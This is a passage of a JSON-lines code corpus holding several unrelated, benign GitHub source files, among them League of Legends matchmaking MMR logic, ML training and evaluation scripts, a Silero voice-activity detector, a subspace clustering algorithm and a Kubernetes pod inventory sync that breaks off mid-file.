\"SILVERI\": 1600,\n \"GOLDIV\": 1700,\n \"GOLDIII\": 1750,\n \"GOLDII\": 1850,\n \"GOLDI\": 1900,\n \"PLATINUMIV\": 2000,\n \"PLATINUMIII\": 2050,\n \"PLATINUMII\": 2150,\n \"PLATINUMI\": 2200,\n \"DIAMONDIV\": 2300,\n \"DIAMONDIII\": 2350,\n \"DIAMONDII\": 2450,\n \"DIAMONDI\": 2500,\n \"MASTERI\": 2750,\n \"GRANDMASTERI\": 3000,\n \"CHALLENGERI\": 3250,\n }\n\n laneMMR = {(side, role): 0 for side in SideEnum for role in RoleEnum}\n\n blueTeamMMR = 0\n redTeamMMR = 0\n for gameparticipant in team:\n summoner = await lol.get_summoner_by_puuid(\n str(gameparticipant.player.summoner_puuid)\n )\n playerRankInfo = await lol.get_summoner_rank_info_by_id(summoner.id)\n\n if playerRankInfo:\n rankString = playerRankInfo[\"tier\"] + playerRankInfo[\"rank\"]\n value = mmrValues[rankString]\n else:\n value = mmrValues[\"BRONZEI\"]\n\n if gameparticipant.side == SideEnum.BLUE:\n blueTeamMMR += value\n\n elif gameparticipant.side == SideEnum.RED:\n redTeamMMR += value\n\n # Storing each players lane mmr\n laneMMR[(gameparticipant.side, gameparticipant.role)] = value\n\n teamMMR = abs(blueTeamMMR - redTeamMMR)\n teamMMRWithLane = teamMMR + get_lane_differential(laneMMR)\n\n logging.info(\n f\"Blue Team: {blueTeamMMR} | Red Team: {redTeamMMR} | TeamMMRDifferenceWithLane: {teamMMRWithLane}\"\n )\n return GameInfo(blueTeamMMR, redTeamMMR, teamMMRWithLane)\n\n\ndef get_lane_differential(laneMMR: Dict[Tuple[SideEnum, RoleEnum], int]) -> int:\n \"\"\"\n 1. Get each players opponent and attempt to put players of equal level against each other, if they queue for the same role\n \"\"\"\n topDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.TOP)] - laneMMR[(SideEnum.RED, RoleEnum.TOP)]\n )\n\n jgDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.JGL)] - laneMMR[(SideEnum.RED, RoleEnum.JGL)]\n )\n\n midDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.MID)] - laneMMR[(SideEnum.RED, RoleEnum.MID)]\n )\n\n botDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.BOT)] - laneMMR[(SideEnum.RED, RoleEnum.BOT)]\n )\n\n suppDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.SUP)] - laneMMR[(SideEnum.RED, RoleEnum.SUP)]\n )\n return topDiff + jgDiff + midDiff + botDiff + suppDiff\n\n\nasync def evaluate_game(game: Game) -> GameInfo:\n teamsList = []\n teamsList.extend(game.teams.BLUE)\n teamsList.extend(game.teams.RED)\n\n return await find_team_and_lane_mmr(teamsList)\n","repo_name":"adamschachne/inhouse_bot","sub_path":"inhouse_bot/matchmaking_logic/evaluate_game.py","file_name":"evaluate_game.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"4045363169","text":"import math\nfrom functools import reduce\nfrom operator import mul\n\nimport cupy\nimport numpy\n\ntry:\n # try importing Cython-based private axis handling functions from CuPy\n if hasattr(cupy, \"_core\"):\n # CuPy 10 renames core->_core\n from cupy._core.internal import _normalize_axis_index # NOQA\n from cupy._core.internal import _normalize_axis_indices # NOQA\n else:\n from cupy.core.internal import _normalize_axis_index # NOQA\n from cupy.core.internal import _normalize_axis_indices # NOQA\n\nexcept ImportError:\n # Fallback to local Python implementations\n\n def _normalize_axis_index(axis, ndim): # NOQA\n \"\"\"\n Normalizes an axis index, ``axis``, such that is a valid positive\n index into the shape of array with ``ndim`` dimensions. Raises a\n ValueError with an appropriate message if this is not possible.\n Args:\n axis (int):\n The un-normalized index of the axis. Can be negative\n ndim (int):\n The number of dimensions of the array that ``axis`` should\n be normalized against\n Returns:\n int:\n The normalized axis index, such that\n `0 <= normalized_axis < ndim`\n \"\"\"\n if axis < 0:\n axis += ndim\n if not (0 <= axis < ndim):\n raise numpy.AxisError(\"axis out of bounds\")\n return axis\n\n def _normalize_axis_indices(axes, ndim): # NOQA\n \"\"\"Normalize axis indices.\n Args:\n axis (int, tuple of int or None):\n The un-normalized indices of the axis. Can be negative.\n ndim (int):\n The number of dimensions of the array that ``axis`` should\n be normalized against\n Returns:\n tuple of int:\n The tuple of normalized axis indices.\n \"\"\"\n if axes is None:\n axes = tuple(range(ndim))\n elif not isinstance(axes, tuple):\n axes = (axes,)\n\n res = []\n for axis in axes:\n axis = _normalize_axis_index(axis, ndim)\n if axis in res:\n raise ValueError(\"Duplicate value in 'axis'\")\n res.append(axis)\n\n return tuple(sorted(res))\n\n\nif hasattr(math, \"prod\"):\n prod = math.prod\nelse:\n\n def prod(iterable, *, start=1):\n return reduce(mul, iterable, start)\n","repo_name":"rapidsai/cucim","sub_path":"python/cucim/src/cucim/skimage/_vendored/_internal.py","file_name":"_internal.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"52"} +{"seq_id":"34118933706","text":"# -*- coding: utf-8 -*-\n\n##### Imports #####\nimport loading\nfrom modeling import modeling\nfrom evaluation import evaluation\nfrom utils import utils as u\nimport constants as cst\n\nimport pandas as pd\n\n##### Set Logger #####\nfrom src.utils.loggers import MainLogger\n\nlogger = MainLogger.getLogger(__name__)\n\n##### Processors #####\ndef main_model_training_pipeline() -> None:\n \"\"\"\n Loads and preprocesses the training data, trains and saves a model with\n optimal hyperparameters, computes training performance metrics, make\n predictions on the training set and saves results.\n \"\"\"\n sample_df = loading.load_training_data()\n\n train_model_pipeline(data=sample_df, predictions_path=cst.PREDICTED_TRAIN_FILE_PATH)\n\n\ndef train_model_pipeline(\n data: pd.DataFrame, predictions_path: str, model_name: str = \"\"\n) -> None:\n \"\"\"Launches a pipeline that trains a model based on the data passsed to it\n and saves the preprocessed data, model, training performances, and\n predictions.\n\n Args:\n data (pd.DataFrame): df containg the data on which the model will be\n trained.\n predictions_path (str): path where to save the predictions.\n model_name (str, optional):name of the model to be passed to the save\n model funcion. Defaults to \"\".\n \"\"\"\n # Preprocess and save training data\n data_preprocessed = cst.PREPROCESSOR(data, cst.column_types)\n save_preprocessed_training_data(data_preprocessed)\n\n # Train and save model\n model, _ = modeling.main_modeling_from_name(\n data_preprocessed.drop(columns=[cst.y_name]), data_preprocessed[cst.y_name]\n )\n u.save_model(model, name=model_name)\n\n # Compute and save model performance metrics\n training_performance_metrics = evaluation.cross_evaluate_model_performance(\n model,\n data_preprocessed.drop(columns=[cst.y_name]),\n data_preprocessed[cst.y_name],\n )\n u.save_training_performance_metrics(training_performance_metrics)\n\n # Make predictions on the training set and save results\n data_preprocessed_pred = make_predictions(model, data_preprocessed)\n loading.write_csv_from_path(data_preprocessed_pred, path=predictions_path)\n\n\ndef make_predictions(model, sample_df_preprocessed: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Add predictions to the preprocessed dataset\n\n Args:\n model (Pipeline): trained model\n sample_df_preprocessed (pd.DataFrame): preprocessed data\n\n Returns:\n pd.DataFrame: preprocessed data with predicted labels and probabilities\n \"\"\"\n sample_df_preprocessed_pred = sample_df_preprocessed.copy()\n\n sample_df_preprocessed_pred[cst.y_pred] = model.predict(\n sample_df_preprocessed_pred.drop(cst.y_name, axis=1)\n )\n sample_df_preprocessed_pred[\n [\n f\"{cst.y_pred_proba}_{cst.y_class_labels[0]}\",\n f\"{cst.y_pred_proba}_{cst.y_class_labels[1]}\",\n ]\n ] = model.predict_proba(\n sample_df_preprocessed_pred.drop([cst.y_name, cst.y_pred], axis=1)\n )\n\n return sample_df_preprocessed_pred\n\n\ndef save_predicted_training_data(sample_df_preprocessed_pred: pd.DataFrame) -> None:\n \"\"\"Save training data with predicted labels and corresponding probabilities\n\n Args:\n sample_df_preprocessed_pred (pd.DataFrame): preprocessed train data \n with predicted labels and probabilities.\n \"\"\"\n loading.write_csv_from_path(\n sample_df_preprocessed_pred, cst.PREDICTED_TRAIN_FILE_PATH\n )\n\n\ndef save_preprocessed_training_data(sample_df_preprocessed: pd.DataFrame) -> None:\n \"\"\"Save preprocessed training data.\"\"\"\n loading.write_csv_from_path(\n sample_df_preprocessed, cst.PREPROCESSED_TRAIN_FILE_PATH\n )\n\n\nif __name__ == \"__main__\":\n # create and set up logger\n import logging\n\n logging.basicConfig(\n filename=cst.TRAINING_LOG_FILE_PATH, filemode=\"w\", level=logging.INFO\n )\n logger = logging.getLogger(__name__)\n\n main_model_training_pipeline()\n","repo_name":"henrique-britoleao/monitoring-project","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11927886305","text":"# Define the TABLE and its uppercase version\nTABLE = \"qwertyuiopasdfghjkl;zxcvbnm,./_\"\nTABLE = TABLE.upper()\nTABLE2 = \"QWERTYUIOPASDFGHJKL;ZXCVBNM,./\"\nTABLE3 = \"1234567890一二三四五六七八九十竹廾廿火乂手木人尸/\"\nTABLE4 = \"中乙貝心彎女刀日月口一二三四五六土八九十竹草散火插手木人耳空\"\n\n# Read the data from the file\nwith open(\"so61utf8.txt\", \"r\", encoding=\"utf-8\") as file:\n data = file.read()\n\n# Split the data into lines\nlines = data.split(\"\\n\")\n\n# Create a dictionary to map TABLE keys to characters\ntable_dict = {}\nfor line in lines:\n if line:\n key, value = line[:3], line[3:]\n key = key.strip()\n value = value.strip()\n for i, char in enumerate(value):\n # Use modulo to ensure cyclic access to TABLE characters\n replaced_key = key.replace('_', TABLE[i % len(TABLE)], 1)\n if char in table_dict:\n table_dict[char].append(replaced_key)\n else:\n table_dict[char] = [replaced_key]\n\n# Read the input string from stdin\ntry:\n input_str = input(\"Enter a string: \")\nexcept EOFError:\n print(\"EOF reached. Exiting.\")\n exit()\n\n# Process the input string and replace characters with TABLE keys\noutput_str = \"\"\nfor char in input_str:\n if char in table_dict:\n output_str += char + \" \" + \" \".join(table_dict[char]) + \"\\n\"\n else:\n output_str += char + \" (No TABLE key)\\n\"\n\n# Print the output\nprint(output_str)\n\n# Define the TABLE and its uppercase version\n# TABLE = \"qwertyuiopasdfghjkl;zxcvbnm,./_\"\n# TABLE = TABLE.upper()\nTABLE2 = \"QWERTYUIOPASDFGHJKL;ZXCVBNM,./﹏\"\nTABLE3 = \"1234567890一二三四五六七八九十竹廾廿火乂手木人尸/﹏\"\nTABLE4 = \"中乙貝心彎女刀日月口一二三四五六土八九十竹草散火插手木人耳空﹏\"\n\ndef replace_chars_with_tables(input_str):\n # Initialize the output string\n output_str = \"\"\n str3 = \"\"\n str4 = \"\"\n\n # Iterate over each character in the input_str\n for char in input_str:\n # Find the index of the character in TABLE\n index = TABLE.find(char)\n \n if index != -1:\n # Replace the character with the corresponding character from TABLE2, TABLE3, or TABLE4\n output_str += \" \" + TABLE2[index] \n str3 += \" \" + TABLE3[index] \n str4 += \" \" + TABLE4[index]\n else:\n # If the character is not in TABLE, keep it as is\n output_str += char\n str3 += char\n str4 += char \n return output_str, str3, str4\n\n# Test the function with your example\n# example = \"輸 ;U_\"\noutput_str2, out3, out4 = replace_chars_with_tables(output_str)\nprint(output_str2)\nprint(out3)\nprint(out4)\n\n\n\n","repo_name":"HexColors60/so61ime","sub_path":"str61code.py","file_name":"str61code.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39767228843","text":"import datasets\nfrom transformers import T5ForConditionalGeneration, AutoTokenizer\nimport torch\nimport pickle\nimport evaluate\n\n\nxsum = datasets.load_dataset(\"xsum\")\n\nmodel_name = \"t5-base\"\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nt5_tokenizer = AutoTokenizer.from_pretrained(model_name)\nt5_model = T5ForConditionalGeneration.from_pretrained(model_name).to(device)\n\npreds, gts = [], []\ncounter = 0\nprefix = \"summarize: \"\nfor idx in range(xsum['test'].num_rows):\n batch = t5_tokenizer(prefix + xsum['test'][idx]['document'], truncation=True, padding=\"longest\", return_tensors=\"pt\").to(device)\n translated = t5_model.generate(**batch)\n tgt_text = t5_tokenizer.batch_decode(translated, skip_special_tokens=True)\n # data_idx = dataset['test'][idx]['id']\n preds.append(tgt_text[0])\n gts.append(xsum['test'][idx]['summary'])\n # counter += 1\n # if counter % 10 == 0:\n # print('done with test', counter)\n\nwith open('predictions_exp1', 'wb') as f:\n pickle.dump(preds, f)\nwith open('gts_exp1', 'wb') as f:\n pickle.dump(gts, f)\n\nrouge = evaluate.load(\"rouge\")\nresult = rouge.compute(predictions=preds, references=gts, use_stemmer=True)\nprint(result)","repo_name":"medhap02/DataContaminationResearch","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33008961611","text":"# Write a program to convert month name to the number of days correspondant to that month\r\n\r\nmonth=str(input(\"Input the Month name: \")) # Requests a string input from the user\r\nfeb=\"February has 28 or 29 days.\" # February is its own variable, as it is the only month with an entirely new, non-fixed value\r\na=[\"January\",\"March\",\"May\",\"July\",\"August\",\"October\",\"December\"] # Months with 31 days are grouped into a LIST\r\nb=[\"April\",\"June\",\"September\",\"November\"] # Months with 30 days are grouped into a second LIST\r\nif month==(\"February\"):\r\n print(feb) # If the month happens to be February, prints February's own message\r\nfor i in a: # My first use of a FOR loop, uses \"i\" as a temporary value to scan through the contents of list [a]\r\n if i==month: # When the temporary value \"i\" is the same as the user input as outlined in list [a], prints the 31 day message\r\n print(month,\"has 31 days.\")\r\nfor i in b:\r\n if i==month: # When the temporary value \"i\" is the same as the user input as outlined in list [b], prints the 30 day message\r\n print(month,\"has 30 days.\")\r\n# I found this to be a very troublesome piece of code when I was not aware of for loops, and very easy after having figured them out.\r\n","repo_name":"20220856/RR-20220856.github.io","sub_path":"Software-Development/Code/Python/month-name-to-days.py","file_name":"month-name-to-days.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"35061340236","text":"import os\nimport time\nimport copy\nimport numpy as np\nimport itertools\nimport scipy.linalg\nfrom numba import njit\nfrom tqdm import tqdm\nfrom karcher_mean import karcher_mean as km\nfrom draw_utils import draw_3d_clusters, draw_spiral_clusters\nfrom sklearn.neighbors import NearestNeighbors\nfrom multiprocessing import Pool\n\n\ndef d_hat(Ci, Cj):\n d_mean = d_geodesic(Ci.M, Cj.M)\n d = (len(Ci) + len(Cj)) * (d_mean ** 2) + 2 * d_mean * (Ci.d + Cj.d)\n return d\n\n\ndef d_geodesic(x, y):\n # Reference: http://dx.doi.org/10.1137%2FS1064827500377332 Page 3\n # This is unstable numerically but it should be fine here\n ua, sa, vha = scipy.linalg.svd(x)\n ub, sb, vhb = scipy.linalg.svd(y)\n ua_smaller = ua[:, :sa.shape[0]]\n ub_smaller = ub[:, :sa.shape[0]]\n QaTQb = np.dot(ua_smaller.T, ub_smaller)\n uQaTQb, sQaTQb, vhQaTQb = scipy.linalg.svd(QaTQb)\n sQaTQb.clip(0, 1, out=sQaTQb)\n thetas = np.arccos(sQaTQb)\n return np.linalg.norm(thetas, ord=2) ** 2\n\n\n@njit(cache=True)\ndef argmin_dissimilarity(D, l):\n \"\"\"\n Finds the argmin on a ndarray D which is supposed to be triu and with -1 for non valid distances\n l can be used to specify the actual size of the valid submatrix (for efficiency)\n \"\"\"\n n, m = D.shape\n l = m - l\n min_v = np.inf\n min_idx = (-1, -1)\n for i in range(n - l):\n for j in range(i, m - l):\n x = D[i, j]\n if x == -1:\n continue\n if x < min_v:\n min_v = x\n min_idx = (i, j)\n return min_idx\n\n\ndef delete_rowcolumn(D, i, l):\n \"\"\"\n Updates a distance matrix D by removing the row and column i\n It actually moves the row / column i to the end of the matrix so that\n there's no creation of a new array (more efficient)\n \"\"\"\n l = D.shape[0] - l\n e = -l + 1 if -l + 1 != 0 else D.shape[0]\n\n D[:i, i:-l] = D[:i, i + 1:e]\n D[i:-l, :i] = D[i + 1:e, :i]\n D[i:-l, i:-l] = D[i + 1:e, i + 1:e]\n D[-l, :] = -1\n D[:, -l] = -1\n return D\n\n\nclass Cluster:\n \"\"\"\n Class representing each cluster formed by the algorithm\n \"\"\"\n def __init__(self, X, points, indices, M=None):\n assert len(points) == len(indices)\n self.X = X\n self.points = points\n self.indices = indices\n self.F = None\n self.M = M\n self.d = 0\n\n def merge(self, other):\n self.X.extend(other.X)\n self.points.extend(other.points)\n self.indices.extend(other.indices)\n self.M = None\n self.d = None\n\n def update_mean(self, pool=None):\n iters = 3 if len(self.points) < 100 else 2 if len(self.points) < 250 else 1\n self.M = km(self.points, len(self.points), 1e-6, iters, pool) # TODO\n self.update_distance(pool=pool)\n\n def update_distance(self, pool=None):\n if pool is None:\n self.d = sum([d_geodesic(self.M, Mx) for Mx in self.points])\n else:\n self.d = sum(pool.starmap(d_geodesic, ((self.M, Mx) for Mx in self.points)))\n\n def __len__(self):\n return len(self.indices)\n\n\nclass ACDT:\n \"\"\"\n The ACDT algorithm for clustering\n \"\"\"\n def __init__(self, k, l, d, X, minimum_ckpt=100, store_every=0, visualize=False):\n \"\"\"\n k: number of neighbors during knn.\n l: number of target clusters.\n d: subspace dimensional size\n X: The dataset\n minimum_ckpt: if the number of clusters is < minimum_ckpt the checkpoints are saved\n ckpt_every: The interval between checkpoints (0 no checkpoints)\n \"\"\"\n self.n = X.shape[0]\n self.X = X\n self.k = k\n self.l = l\n self.d = d\n self.minimum_ckpt = minimum_ckpt\n self.store_every = store_every\n self.visualize = visualize\n self.checkpoints = {'knn': self.k, 'X': copy.deepcopy(self.X)}\n PROCESS = os.cpu_count()\n self.pool = Pool(processes=PROCESS)\n\n self.knn = NearestNeighbors(n_neighbors=self.k + 1, metric='euclidean').fit(X)\n k_indices = self.knn.kneighbors(X, return_distance=False)[:, 1:] # Compute k-nearest neighbors indices\n self.E = self.knn.kneighbors_graph(X).astype(np.int) # This is not used but is the edge map\n self.D = np.ones((self.n, self.n)) * -1\n\n self.C = []\n self.map_cluster = [] # Maps sample idx to cluster containing it\n for i, x in enumerate(X):\n Nx = X[k_indices[i]] # Take k neighbors\n N0x = (Nx - x).T # Translate neighborhood to the origin\n u_N0x, _, _ = scipy.linalg.svd(N0x, full_matrices=False)\n M = u_N0x[:, :d] # Take d-rank svd\n self.C.append(Cluster([x], [M], [i], M))\n self.map_cluster.append(self.C[-1])\n\n # Precompute all the distances and populate D\n print('Initializing the distances between clusters')\n pairs = {}\n for Ci in self.C:\n neigh = set(self.knn.kneighbors(Ci.X, return_distance=False)[:, 1:].flatten())\n neigh_c = set([self.map_cluster[n] for n in neigh])\n pairs[Ci] = [(Ci, Cj) if self.C.index(Ci) < self.C.index(Cj) else (Cj, Ci) for Cj in neigh_c if Ci != Cj]\n pairs = set(itertools.chain.from_iterable(pairs.values())) # Single list of pairs\n\n distances = self.pool.starmap(d_hat, pairs)\n for ith, (Ci, Cj) in enumerate(pairs):\n i, j = self.C.index(Ci), self.C.index(Cj)\n i, j = min(i, j), max(i, j) # So that we always populate upper part\n self.D[i, j] = distances[ith]\n print('Computed %s distances' % np.count_nonzero(self.D != -1))\n\n def fusible(self, Ci, Cj):\n \"\"\"\n To check if two clusters are fusible we have to see if there's an edge connecting them\n we can iterate on Ci and see if it is connected to any sample in Cj.\n\n This is not used as is very inefficient\n \"\"\"\n for i in Ci.indices:\n for j in Cj.indices:\n if self.E[i, j] == 1:\n return True\n return False\n\n def fit(self):\n for _ in tqdm(range(self.n, self.l, -1)):\n i, j = argmin_dissimilarity(self.D, len(self.C))\n if i == -1 or j == -1:\n print('No clusters can be merged, probably k is too low, stopping with %s clusters' % len(self.C))\n break\n i, j = min(i, j), max(i, j)\n Ci, Cj = self.C[i], self.C[j]\n\n # Save neighbors of Cj\n l = self.D.shape[0] - len(self.C)\n e = -l + 1 if -l + 1 != 0 else self.D.shape[0]\n ind_r = np.argwhere(self.D[:j, j] != -1)\n ind_c = np.argwhere(self.D[j, j + 1:e] != -1) + j + 1\n Cj_neigh = [self.C[idx.item()] for idx in itertools.chain(ind_r, ind_c)]\n\n self.C.remove(Cj)\n Ci.merge(Cj)\n Ci.update_mean(pool=self.pool)\n\n for s_idx in Cj.indices:\n self.map_cluster[s_idx] = Ci\n\n # Update distances\n self.D = delete_rowcolumn(self.D, j, len(self.C)) # Delete (offset all to left to skip it) column and row j\n\n # Now for each connection with Ci update the distance\n neigh = set(self.knn.kneighbors(Ci.X, return_distance=False)[:, 1:].flatten())\n Ci_neigh = set([self.map_cluster[n] for n in neigh])\n index_Ci = self.C.index(Ci)\n pairs = set((Ci, Cj) if index_Ci < self.C.index(Cj) else (Cj, Ci) for Cj in Ci_neigh if Ci != Cj)\n pairs.update((Ci, Cj) if index_Ci < self.C.index(Cj) else (Cj, Ci) for Cj in Cj_neigh if Ci != Cj)\n\n distances = self.pool.starmap(d_hat, pairs)\n for ith, (Ci, Cj) in enumerate(pairs):\n i, j = self.C.index(Ci), self.C.index(Cj)\n i, j = min(i, j), max(i, j) # So that we always populate upper part\n self.D[i, j] = distances[ith]\n\n if self.store_every != 0 and len(self.C) < self.minimum_ckpt and len(self.C) % self.store_every == 0:\n for Ci in self.C:\n samples = np.array(Ci.X).T\n mean_pos = np.mean(samples, axis=1, keepdims=True)\n C0mi = samples - mean_pos\n u_C0mi, _, _ = scipy.linalg.svd(C0mi, full_matrices=False)\n Ci.F = u_C0mi[:, :self.d]\n\n self.checkpoints[len(self.C)] = {'C': copy.deepcopy(self.C)}\n for Ci in self.checkpoints[len(self.C)]['C']: # To reduce the size on disk\n Ci.X = None\n Ci.points = None\n\n if self.visualize:\n if self.X.shape[1] == 2:\n draw_spiral_clusters(self.C, self.X, self.k)\n if self.X.shape[1] == 3:\n draw_3d_clusters(self.C, self.X)\n\n # Compute final flats\n for Ci in self.C:\n samples = np.array(Ci.X).T\n mean_pos = np.mean(samples, axis=1, keepdims=True)\n C0mi = samples - mean_pos\n u_C0mi, s, _ = scipy.linalg.svd(C0mi, full_matrices=False)\n Ci.F = u_C0mi[:, :self.d]\n","repo_name":"JunkyByte/ACDT","sub_path":"src/acdt.py","file_name":"acdt.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9859553470","text":"import tkinter\n\nMY_FONT = (\"Arial\", 14, \"normal\")\n\nwindow = tkinter.Tk()\n\nwindow.title(\"Miles to km converter\")\n\nwindow.minsize(width=300, height=200)\n\nwindow.config(padx=50, pady=50)\n\n\ndef button_clicked():\n miles = entry.get()\n kms = int(int(miles) * 1.60934)\n label_res[\"text\"] = kms\n\n# Labels\nlabel_equal = tkinter.Label(text=\"is equal to\", font=MY_FONT)\nlabel_equal.grid(row=1, column=0)\nlabel_km = tkinter.Label(text=\"Km\", font=MY_FONT)\nlabel_km.grid(row=1, column=2)\nlabel_miles = tkinter.Label(text=\"Miles\", font=MY_FONT)\nlabel_miles.grid(row=0, column=2)\nlabel_res = tkinter.Label(text=\"0\", font=MY_FONT)\nlabel_res.grid(row=1, column=1)\n# Entry\nentry = tkinter.Entry(width=20)\nentry.grid(row=0, column=1)\n\n# Button\nbutton = tkinter.Button(text=\"Calculate\", command=button_clicked)\nbutton.grid(column=1, row=2)\n\n\nwindow.mainloop()\n","repo_name":"lucianomel/100DaysOfPython","sub_path":"day27/miles_to_km.py","file_name":"miles_to_km.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23141382739","text":"\n# TODO: support running C++ version\n# https://github.com/snakers4/silero-vad/tree/master/examples/cpp\n\nimport time\nfrom pprint import pprint\n\nimport torch\nimport numpy\nimport pandas\n\n\ndef get_frame_scores(audio: torch.Tensor,\n model,\n sampling_rate: int = 16000,\n window_size_samples: int = 512):\n\n \"\"\"\n Return frame-wise scores / probabilities\n\n Parameters\n ----------\n audio: torch.Tensor, one dimensional\n One dimensional float torch.Tensor, other types are casted to torch if possible\n\n model: preloaded .jit silero VAD model\n\n sampling_rate: int (default - 16000)\n Currently silero VAD models support 8000 and 16000 sample rates\n\n window_size_samples: int (default - 512 samples)\n Audio chunks of window_size_samples size are fed to the silero VAD model.\n WARNING! Silero VAD models were trained using 512, 1024, 1536 samples for 16000 sample rate\n and 256, 512, 768 samples for 8000 sample rate.\n Values other than these may affect model perfomance!!\n\n Returns\n ----------\n speeches: list of dicts\n list containing ends and beginnings of speech chunks (samples or seconds based on return_seconds)\n \"\"\"\n\n if not torch.is_tensor(audio):\n try:\n audio = torch.Tensor(audio)\n except:\n raise TypeError(\"Audio cannot be casted to tensor. Cast it manually\")\n\n if len(audio.shape) > 1:\n for i in range(len(audio.shape)): # trying to squeeze empty dimensions\n audio = audio.squeeze(0)\n if len(audio.shape) > 1:\n raise ValueError(\"More than one dimension in audio. Are you trying to process audio with 2 channels?\")\n\n if sampling_rate > 16000 and (sampling_rate % 16000 == 0):\n step = sampling_rate // 16000\n sampling_rate = 16000\n audio = audio[::step]\n warnings.warn('Sampling rate is a multiply of 16000, casting to 16000 manually!')\n else:\n step = 1\n\n if sampling_rate == 8000 and window_size_samples > 768:\n warnings.warn('window_size_samples is too big for 8000 sampling_rate! Better set window_size_samples to 256, 512 or 768 for 8000 sample rate!')\n if window_size_samples not in [256, 512, 768, 1024, 1536]:\n warnings.warn('Unusual window_size_samples! Supported window_size_samples:\\n - [512, 1024, 1536] for 16000 sampling_rate\\n - [256, 512, 768] for 8000 sampling_rate')\n\n model.reset_states()\n\n audio_length_samples = len(audio)\n\n speech_probs = []\n for current_start_sample in range(0, audio_length_samples, window_size_samples):\n chunk = audio[current_start_sample: current_start_sample + window_size_samples]\n if len(chunk) < window_size_samples:\n chunk = torch.nn.functional.pad(chunk, (0, int(window_size_samples - len(chunk))))\n speech_prob = model(chunk, sampling_rate).item()\n speech_probs.append(speech_prob)\n\n return speech_probs\n\n\ndef predict_file(model, path, samplerate = 16000, window_size_samples = 512):\n \n model, utils = model\n (get_speech_timestamps, _, read_audio, *_) = utils\n \n\n wav = read_audio(path, sampling_rate=samplerate)\n\n # Run model to get raw predictions / probabilities\n start_time = time.time()\n speech_probs = get_frame_scores(wav, model,\n sampling_rate=samplerate,\n window_size_samples=window_size_samples)\n end_time = time.time()\n\n predict_time_ms = (end_time-start_time) * 1000.0\n print(f'prediction time {predict_time_ms} ms')\n\n times = numpy.arange(0, len(speech_probs)) * window_size_samples/samplerate\n\n # get post-procesed speech segments\n #speech_timestamps = get_speech_timestamps(wav, model, sampling_rate=samplerate, return_seconds=True)\n\n df = pandas.DataFrame({\n 'time': times,\n 'probability': speech_probs,\n })\n return df\n\n\ndef load_model(force_reload=False):\n model, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',\n model='silero_vad',\n force_reload=force_reload)\n\n return (model, utils)\n\n\ndef parse(args=None):\n import argparse\n\n parser = argparse.ArgumentParser(description='Voice Activity Detection using Silero VAD')\n a = parser.add_argument\n\n a('input', type=str, metavar='PATH',\n help='Path to input audio file')\n\n a('--out', type=str, metavar='PATH', default=None,\n help='Path to output file. CSV')\n\n parsed = parser.parse_args(args)\n return parsed\n\ndef main():\n args = parse()\n\n torch.set_num_threads(1)\n\n m = load_model()\n\n probs = predict_file(m, args.input)\n out_path = args.out\n if out_path is not None:\n probs.to_csv(out_path)\n print('Wrote', out_path)\n\nif __name__ == '__main__':\n main()\n \n\n\n \n","repo_name":"jonnor/embeddedml","sub_path":"emlearn/microvad/microvad/silerovad/vad.py","file_name":"vad.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"52"} +{"seq_id":"32985475221","text":"import logging\nfrom typing import Dict\nfrom typing import List\n\nfrom neo4j import Session\n\nfrom cartography.intel.kubernetes.util import get_epoch\nfrom cartography.intel.kubernetes.util import K8sClient\nfrom cartography.util import timeit\n\nlogger = logging.getLogger(__name__)\n\n\n@timeit\ndef sync_pods(\n session: Session, client: K8sClient, update_tag: int, cluster: Dict,\n) -> List[Dict]:\n pods = get_pods(client, cluster)\n load_pods(session, pods, update_tag)\n return pods\n\n\n@timeit\ndef get_pods(client: K8sClient, cluster: Dict) -> List[Dict]:\n pods = list()\n for pod in client.core.list_pod_for_all_namespaces().items:\n containers = {}\n for container in pod.spec.containers:\n containers[container.name] = {\n \"name\": container.name,\n \"image\": container.image,\n \"uid\": f\"{pod.metadata.uid}-{container.name}\",\n }\n if pod.status and pod.status.container_statuses:\n for status in pod.status.container_statuses:\n if status.name in containers:\n _state = 'waiting'\n if status.state.running:\n _state = 'running'\n elif status.state.terminated:\n _state = 'terminated'\n try:\n image_sha = status.image_id.split(\"@\")[1]\n except IndexError:\n image_sha = None\n containers[status.name][\"status\"] = {\n \"image_id\": status.image_id,\n \"image_sha\": image_sha,\n \"ready\": status.ready,\n \"started\": status.started,\n \"state\": _state,\n }\n pods.append(\n {\n \"uid\": pod.metadata.uid,\n \"name\": pod.metadata.name,\n \"status_phase\": pod.status.phase,\n \"creation_timestamp\": get_epoch(pod.metadata.creation_timestamp),\n \"deletion_timestamp\": get_epoch(pod.metadata.deletion_timestamp),\n \"namespace\": pod.metadata.namespace,\n \"node\": pod.spec.node_name,\n \"cluster_uid\": cluster[\"uid\"],\n \"labels\": pod.metadata.labels,\n \"containers\": list(containers.values()),\n },\n 